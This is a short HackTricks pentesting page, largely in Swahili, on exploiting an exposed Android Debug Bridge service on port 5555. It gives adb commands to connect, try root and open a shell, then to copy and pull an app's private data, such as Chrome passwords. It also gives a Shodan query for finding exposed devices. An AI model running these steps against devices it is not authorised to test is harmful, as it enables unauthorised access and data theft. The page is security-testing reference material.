5555 - Android Debug Bridge

Reading time: 2 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Basic Information

From the docs:

Android Debug Bridge (adb) ni zana ya amri ya mstari inayoweza kutumika kuwasiliana na kifaa. Amri ya adb inarahisisha vitendo mbalimbali vya kifaa, kama vile kusanidi na kufanyia kazi programu, na inatoa ufikiaji wa shell ya Unix ambayo unaweza kutumia kuendesha amri mbalimbali kwenye kifaa.

Port ya kawaida: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

Ikiwa unapata huduma ya ADB ikifanya kazi kwenye bandari ya kifaa na unaweza kuungana nayo, unaweza kupata shell ndani ya mfumo:

bash
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Kwa maelezo zaidi ya amri za ADB angalia ukurasa ufuatao:

{{#ref}} ../mobile-pentesting/android-app-pentesting/adb-commands.md {{#endref}}

Punguza data ya programu

Ili kupakua kabisa data ya programu unaweza:

bash
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Unaweza kutumia hila hii kurejesha taarifa nyeti kama nywila za chrome. Kwa maelezo zaidi kuhusu hii angalia taarifa kwenye viungo vilivyotolewa hapa.

Shodan

  • android debug bridge

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks